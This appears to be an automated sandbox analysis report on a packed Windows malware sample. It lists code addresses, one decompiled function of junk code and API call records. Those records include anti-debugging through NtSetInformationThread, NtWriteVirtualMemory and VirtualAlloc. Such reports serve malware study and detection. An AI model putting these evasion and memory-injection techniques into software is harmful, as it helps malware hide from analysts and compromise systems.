                          0x004018df
                          0x004018e1
                          0x004018e4
                          0x004018e6
                          0x004018e8
                          0x004018e9
                          0x004018ee
                          0x004018f0
                          0x004018f2
                          0x004018f4
                          0x004018f6
                          0x004018f8
                          0x004018f9
                          0x004018fc
                          0x00401900
                          0x00401902
                          0x00401903
                          0x00401905
                          0x00401907
                          0x00401909
                          0x0040190b
                          0x0040190d
                          0x0040190f
                          0x00401911
                          0x00401913
                          0x00401916
                          0x00401917
                          0x0040191a
                          0x0040191b
                          0x0040191d
                          0x0040191f
                          0x00401925
                          0x00401927
                          0x00401929
                          0x0040192b
                          0x0040192d
                          0x0040192f
                          0x00401932
                          0x00401933
                          0x00401935
                          0x00401938
                          0x0040193a
                          0x0040193b
                          0x0040193d
                          0x0040193f
                          0x00401941
                          0x00401943
                          0x00401945
                          0x00401947
                          0x00401949
                          0x0040194b
                          0x00401951
                          0x00401954
                          0x00401956
                          0x00401958
                          0x0040195f
                          0x00401961
                          0x00401963
                          0x00401965
                          0x00401967
                          0x0040196b
                          0x0040196d
                          0x00401973
                          0x00401975
                          0x00401977
                          0x00401979
                          0x0040197b
                          0x0040197d
                          0x0040197f
                          0x00401981
                          0x00401985
                          0x00401986
                          0x00401987
                          0x0040198a
                          0x0040198b
                          0x0040198d
                          0x0040198f
                          0x00401995
                          0x00401997
                          0x00401999
                          0x0040199b
                          0x0040199d
                          0x0040199f
                          0x004019a6
                          0x004019a7
                          0x004019ae
                          0x004019b0
                          0x004019b2
                          0x004019b4
                          0x004019b6
                          0x004019b8
                          0x004019ba
                          0x004019bc
                          0x004019be
                          0x004019bf
                          0x004019c2
                          0x004019c3
                          0x004019c5
                          0x004019c7
                          0x004019c9
                          0x004019ce
                          0x004019d0
                          0x004019d2
                          0x004019d4
                          0x004019d6
                          0x004019d8
                          0x004019db
                          0x004019de
                          0x004019e3
                          0x004019e5
                          0x004019e7
                          0x004019e9
                          0x004019eb
                          0x004019ed
                          0x004019ef
                          0x004019f2
                          0x004019f4
                          0x004019f6
                          0x004019f8
                          0x004019fa
                          0x004019fc
                          0x004019fe
                          0x00401a00
                          0x00401a03
                          0x00401a05
                          0x00401a07
                          0x00401a09
                          0x00401a0b
                          0x00401a0e
                          0x00401a0f
                          0x00401a12
                          0x00401a14
                          0x00401a16
                          0x00401a18
                          0x00401a1a
                          0x00401a1c
                          0x00401a1e
                          0x00401a20
                          0x00401a22
                          0x00401a24
                          0x00401a29
                          0x00401a2e
                          0x00401a2f
                          0x00401a32
                          0x00401a33
                          0x00401a36
                          0x00401a38
                          0x00401a3b
                          0x00401a41
                          0x00401a43
                          0x00401a45
                          0x00401a47
                          0x00401a49
                          0x00401a4b
                          0x00401a4d
                          0x00401a4f
                          0x00401a51
                          0x00401a53
                          0x00401a58
                          0x00401a59
                          0x00401a5a
                          0x00401a5b
                          0x00401a5b
                          0x00401a5b
                          0x00401a5e
                          0x00401ad2
                          0x00401ad2
                          0x00401ad3
                          0x00401ad4
                          0x00401ad8
                          0x00401a60
                          0x00401a60
                          0x00401acd
                          0x00401acd
                          0x00000000
                          0x00401a62
                          0x00401a62
                          0x00401a66
                          0x00401a68
                          0x00401a69
                          0x00401a6c
                          0x00401a6e
                          0x00401a72
                          0x00401a74
                          0x00401a75
                          0x00401a77
                          0x00401a7d
                          0x00401a7d
                          0x00401a7e
                          0x00401a82
                          0x00401a84
                          0x00401a8a
                          0x00401a8c
                          0x00401a8e
                          0x00401a90
                          0x00401a92
                          0x00401a94
                          0x00401a96
                          0x00401a98
                          0x00401a9a
                          0x00401a9d
                          0x00401aa0
                          0x00401aa2
                          0x00401aa4
                          0x00401aa6
                          0x00401aa8
                          0x00401aaa
                          0x00401aac
                          0x00401aae
                          0x00401ab0
                          0x00401ab2
                          0x00401ab4
                          0x00401ab6
                          0x00401ab8
                          0x00401aba
                          0x00401abc
                          0x00401ac1
                          0x00401ac3
                          0x00401ac6
                          0x00401ac8
                          0x00000000
                          0x00401ac8
                          0x00401a6c
                          0x00401a60
                          0x00401ad9
                          0x00401adb
                          0x00401add
                          0x00401adf
                          0x00401ae1
                          0x00401ae3
                          0x00401ae5
                          0x00401ae7
                          0x00401ae9
                          0x00401aeb
                          0x00401aed
                          0x00401aef
                          0x00401af1
                          0x00401af3
                          0x00401af5
                          0x00401af7
                          0x00401af9
                          0x00401afb
                          0x00401afd
                          0x00401aff
                          0x00401b01
                          0x00401b03
                          0x00401b07
                          0x00401b09
                          0x00401b0b
                          0x00401b0e
                          0x00401b0f
                          0x00401b16
                          0x00401b18
                          0x00401b1a
                          0x00401b1b
                          0x00401b1d
                          0x00401b1f
                          0x00401b25
                          0x00401b27
                          0x00401b29
                          0x00401b2b
                          0x00401b2d
                          0x00401b2e
                          0x00401b2f
                          0x00401b32
                          0x00401b33
                          0x00401b35
                          0x00401b37
                          0x00401b39
                          0x00401b3c
                          0x00401b3e
                          0x00401b40
                          0x00401b42
                          0x00401b44
                          0x00401b46
                          0x00401b48
                          0x00401b4a
                          0x00401b4b
                          0x00401b4d
                          0x00401b4f
                          0x00401b56
                          0x00401b58
                          0x00401b5a
                          0x00401b5b
                          0x00401b5d
                          0x00401b5f
                          0x00401b66
                          0x00401b69
                          0x00401b6c
                          0x00401b6e
                          0x00401b70
                          0x00401b71
                          0x00401b74
                          0x00401b7d
                          0x00401b80
                          0x00401b81
                          0x00401b83
                          0x00401b85
                          0x00401b87
                          0x00401b89
                          0x00401b8a
                          0x00401b8c
                          0x00401b92
                          0x00401b93
                          0x00401b96
                          0x00401b97
                          0x00401b9a
                          0x00401b9c
                          0x00401b9e
                          0x00401ba1
                          0x00401ba3
                          0x00401ba5
                          0x00401ba7
                          0x00401ba9
                          0x00401bab
                          0x00401bb2
                          0x00401bb6
                          0x00401bb9
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: #100
                          • String ID: VB5!6&*
                          • API String ID: 1341478452-3593831657
                          • Opcode ID: 74c3a27c5e7b214c6470ef477d57e1d50757b982bfcb486dc031bf3b092b0913
                          • Instruction ID: 592f94a81c5e57ebd708ba545b2f23eeb9c7c156f30bca6655cae21d4670f76f
                          • Opcode Fuzzy Hash: 74c3a27c5e7b214c6470ef477d57e1d50757b982bfcb486dc031bf3b092b0913
                          • Instruction Fuzzy Hash: C442CD3244E3C19FC7138B748DA26A27FB4EE1331471D49DFC8C19A1B3D2286A5AD766
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 83%
                          			E00403858() {
                          				signed int _t19;
                          				void* _t21;
                          				void* _t22;
                          				signed int _t23;
                          				signed int _t24;
                          				signed int _t26;
                          				void* _t28;
                          				intOrPtr* _t29;
                          				void* _t36;
                          				signed int _t37;
                          				void* _t38;
                          				signed int _t39;
                          				signed int _t41;
                          
                          				 *_t19 =  *_t19 ^ _t19;
                          				 *_t19 =  *_t19 + _t19;
                          				asm("cdq");
                          				asm("aaa");
                          				asm("bound ebx, [esi-0x45be77cf]");
                          				asm("xlatb");
                          				_t21 = _t36;
                          				_t37 = _t39;
                          				asm("lodsb");
                          				asm("salc");
                          				asm("popfd");
                          				asm("lodsd");
                          				_push(_t21);
                          				es =  *((intOrPtr*)(_t21 - 0x1e064eb6));
                          				_t22 = _t21;
                          				asm("stosb");
                          				 *((intOrPtr*)(_t22 - 0x2d)) =  *((intOrPtr*)(_t22 - 0x2d)) + _t22;
                          				_t23 = _t26 ^  *(_t29 - 0x48ee309a);
                          				_t28 = _t22;
                          				 *_t23 =  *_t23 + _t23;
                          				 *_t23 =  *_t23 + _t23;
                          				 *_t23 =  *_t23 + _t23;
                          				 *_t23 =  *_t23 + _t23;
                          				 *_t23 =  *_t23 + _t23;
                          				 *_t23 =  *_t23 + _t23;
                          				 *_t23 =  *_t23 + _t23;
                          				 *_t23 =  *_t23 + _t23;
                          				 *_t23 =  *_t23 + _t23;
                          				 *_t23 =  *_t23 + _t23;
                          				 *_t23 =  *_t23 + _t23;
                          				 *_t23 =  *_t23 + _t23;
                          				 *_t23 =  *_t23 + _t23;
                          				 *_t23 =  *_t23 + _t23;
                          				 *_t23 =  *_t23 + _t23;
                          				 *_t23 =  *_t23 + _t23;
                          				 *_t23 =  *_t23 + _t23;
                          				 *_t23 =  *_t23 + _t23;
                          				asm("adc eax, [ebx-0x7cf20000]");
                          				 *_t23 =  *_t23 + _t23;
                          				 *_t23 =  *_t23 + _t29;
                          				_t10 = _t37 + 0x66;
                          				 *_t10 =  *((intOrPtr*)(_t37 + 0x66)) + _t29;
                          				asm("o16 jb 0x6b");
                          				asm("popad");
                          				if ( *_t10 <= 0) goto L1;
                          				_t24 = _t23 | 0x45000801;
                          				asm("insd");
                          				if(_t24 >= 0) {
                          					L5:
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					 *_t24 =  *_t24 + _t24;
                          					_push(_t24);
                          					asm("packssdw mm7, mm7");
                          					asm("packuswb xmm2, xmm6");
                          					asm("packuswb mm2, mm5");
                          					asm("packuswb xmm1, xmm1");
                          					asm("punpckhdq xmm6, xmm3");
                          					asm("punpckhbw xmm3, xmm3");
                          					asm("packuswb xmm2, xmm0");
                          					asm("packsswb xmm2, xmm7");
                          					asm("punpckhbw mm4, mm6");
                          					asm("packuswb mm7, mm1");
                          				}
                          				_t41 =  *(_t38 + 0x61) * 0x1190065;
                          				 *0xa2a719c1 =  *0xa2a719c1 + _t24;
                          				_t13 = _t38 + 0x6c000082;
                          				 *_t13 =  *(_t38 + 0x6c000082) & _t37;
                          				if ( *_t13 == 0) goto L3;
                          				 *((intOrPtr*)(_t38 + 0x42000082)) =  *((intOrPtr*)(_t38 + 0x42000082)) + 0xa2a719c1;
                          				asm("scasd");
                          				asm("lodsd");
                          				if (_t41 - 1 <= 0) goto L4;
                          				 *_t24 =  *_t24 + _t24;
                          				 *_t24 =  *_t24 + _t24;
                          				 *[ss:eax] =  *[ss:eax] + _t24;
                          				 *_t24 =  *_t24 + _t29;
                          				 *_t24 =  *_t24 + _t24;
                          				_t24 = _t24 + _t24;
                          				 *_t24 =  *_t24 + _t24;
                          				 *0xa2a719c1 =  *0xa2a719c1 + _t28;
                          				 *_t24 =  *_t24 + _t24;
                          				 *_t29 =  *_t29 + _t24;
                          				 *_t24 =  *_t24 + _t28;
                          				 *_t24 =  *_t24 + _t24;
                          				 *_t24 =  *_t24 + _t24;
                          				 *((intOrPtr*)(_t24 + 0x82)) =  *((intOrPtr*)(_t24 + 0x82)) + _t24;
                          				 *_t24 =  *_t24 + _t24;
                          				 *_t24 =  *_t24 + _t24;
                          				 *_t24 =  *_t24 + _t24;
                          				 *_t24 =  *_t24 + _t24;
                          				 *_t24 =  *_t24 + _t24;
                          				 *_t24 =  *_t24 + _t24;
                          				 *_t24 =  *_t24 + _t24;
                          				 *_t24 =  *_t24 + _t24;
                          				 *_t24 =  *_t24 + _t24;
                          				 *_t24 =  *_t24 + _t24;
                          				 *_t24 =  *_t24 + _t24;
                          				 *_t24 =  *_t24 + _t24;
                          				 *_t24 =  *_t24 + _t24;
                          				 *_t24 =  *_t24 + _t24;
                          				 *_t24 =  *_t24 + _t24;
                          				 *_t24 =  *_t24 + _t24;
                          				 *_t24 =  *_t24 + _t24;
                          				 *_t24 =  *_t24 + _t24;
                          				 *_t24 =  *_t24 + _t24;
                          				goto L5;
                          			}

















                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: E>
                          • API String ID: 4275171209-855000429
                          • Opcode ID: fc4662d94897bbd8d95064013dc74adebccc8bd2ef655760d3a9a967357b9423
                          • Instruction ID: 8e196667fc9cf8ea1f1595be977f2233d61e135b0e9b019b9f32fb53a38ceb6a
                          • Opcode Fuzzy Hash: fc4662d94897bbd8d95064013dc74adebccc8bd2ef655760d3a9a967357b9423
                          • Instruction Fuzzy Hash: FAF1D4D1A2E743C6E593657000C543159A4EEA735A6778BFB6723728C2A33E434B728F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,021D0570,00000000,00000000,00000000,00000000), ref: 021D05F8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: InformationThread
                          • String ID: 1.!T
                          • API String ID: 4046476035-3147410236
                          • Opcode ID: d197fca17fc0180e67d21b6e592c0604f74eaffedbc1dc2732cf89e1772ce896
                          • Instruction ID: 310cc753e2357c20e28ed2197bcec5108b0c3b78728361ff37cf9922dbdc82c4
                          • Opcode Fuzzy Hash: d197fca17fc0180e67d21b6e592c0604f74eaffedbc1dc2732cf89e1772ce896
                          • Instruction Fuzzy Hash: A0317B743C0309EEFB147E388D617EB26929F497D4F904229EDA76B2C0E774C841C651
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 021D481A: LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,021D0570,00000000,00000000,00000000,00000000), ref: 021D05F8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: InformationLibraryLoadThread
                          • String ID: 1.!T
                          • API String ID: 543350213-3147410236
                          • Opcode ID: 03aec2ffbe5e581895b6571daf0e6ec3fd688edb95b59fdd0e8480aa69ee8f65
                          • Instruction ID: c84e28dafd62fa94c4459ecebbc044c3affcd4bcc1ccb66f574078319e673f1a
                          • Opcode Fuzzy Hash: 03aec2ffbe5e581895b6571daf0e6ec3fd688edb95b59fdd0e8480aa69ee8f65
                          • Instruction Fuzzy Hash: B83199783C0319EEFB147E388D61BEB26929F497C4F504229EDA6AB2C0E774CC01C651
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 021D481A: LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,021D0570,00000000,00000000,00000000,00000000), ref: 021D05F8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: InformationLibraryLoadThread
                          • String ID: 1.!T
                          • API String ID: 543350213-3147410236
                          • Opcode ID: 5410f9e8353f6808882fe80bba05084f64ab9930763612efe02085c409cfcd2f
                          • Instruction ID: 28ea7e2b68f33d3f437f1fba649472ac440f6cd03a8c443646ada4a704815383
                          • Opcode Fuzzy Hash: 5410f9e8353f6808882fe80bba05084f64ab9930763612efe02085c409cfcd2f
                          • Instruction Fuzzy Hash: A0319C383C0319EEFB147E388D617EB26969F497C4F904229EDA6AB2C0E774CC01C651
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 021D481A: LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 021D29B5
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: LibraryLoadProcessTerminate
                          • String ID:
                          • API String ID: 3349790660-0
                          • Opcode ID: c672aa40a8413f3ff397fe6fca062ec27c13daa26c55625c4d799e9e08b19e20
                          • Instruction ID: b2de606f4997910d06a3a3582c7c96e5d080ff25dcb27282a4b8a2032bd55f1a
                          • Opcode Fuzzy Hash: c672aa40a8413f3ff397fe6fca062ec27c13daa26c55625c4d799e9e08b19e20
                          • Instruction Fuzzy Hash: EF0278707C0305FEEF346E64CC94BEE2663EF45350F954129ED9A97185C77998C6CA02
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 021D481A: LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,021D0570,00000000,00000000,00000000,00000000), ref: 021D05F8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: InformationLibraryLoadThread
                          • String ID: 1.!T
                          • API String ID: 543350213-3147410236
                          • Opcode ID: 8ceb285f3d875a0eee6ecbe0854fc9ed2e6294d8f7718fe7067693a0749cc1eb
                          • Instruction ID: e2a7a4f997f1239df75067423e683ce4a64de7364e77448d2929ec6a1f9ca0b9
                          • Opcode Fuzzy Hash: 8ceb285f3d875a0eee6ecbe0854fc9ed2e6294d8f7718fe7067693a0749cc1eb
                          • Instruction Fuzzy Hash: BD216A383C4359EEFB246E388E71BD727969F45BD4F900229ED966B2C0D760DC41CA91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 021D481A: LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,021D0570,00000000,00000000,00000000,00000000), ref: 021D05F8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: InformationLibraryLoadThread
                          • String ID: 1.!T
                          • API String ID: 543350213-3147410236
                          • Opcode ID: eb2d2b0faa92adf65643db54b5c8bc31df9528c1fea867c12eec3e43d2b49427
                          • Instruction ID: 954ee39455f7fc8eae630146341c0d6e2a9473b2a11259117ee11c6304a44ad1
                          • Opcode Fuzzy Hash: eb2d2b0faa92adf65643db54b5c8bc31df9528c1fea867c12eec3e43d2b49427
                          • Instruction Fuzzy Hash: A6216B783C4359EAFB146E388D61BE722568F097D4F900225FDA76B1C0E764DC41C591
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,021D0570,00000000,00000000,00000000,00000000), ref: 021D05F8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: InformationThread
                          • String ID: 1.!T
                          • API String ID: 4046476035-3147410236
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 021D481A: LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,021D0570,00000000,00000000,00000000,00000000), ref: 021D05F8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: InformationLibraryLoadThread
                          • String ID: 1.!T
                          • API String ID: 543350213-3147410236
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LdrInitializeThunk.NTDLL(021D157A,?,00000000,?,00000017,0000035D,?,021D39E3,?), ref: 021D3769
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: ninet.dll
                          • API String ID: 2994545307-2962335871
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: E>
                          • API String ID: 4275171209-855000429
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: E>
                          • API String ID: 4275171209-855000429
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: E>
                          • API String ID: 4275171209-855000429
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: E>
                          • API String ID: 4275171209-855000429
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: E>
                          • API String ID: 4275171209-855000429
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: E>
                          • API String ID: 4275171209-855000429
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 021D481A: LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021D2783
                          Memory Dump Source
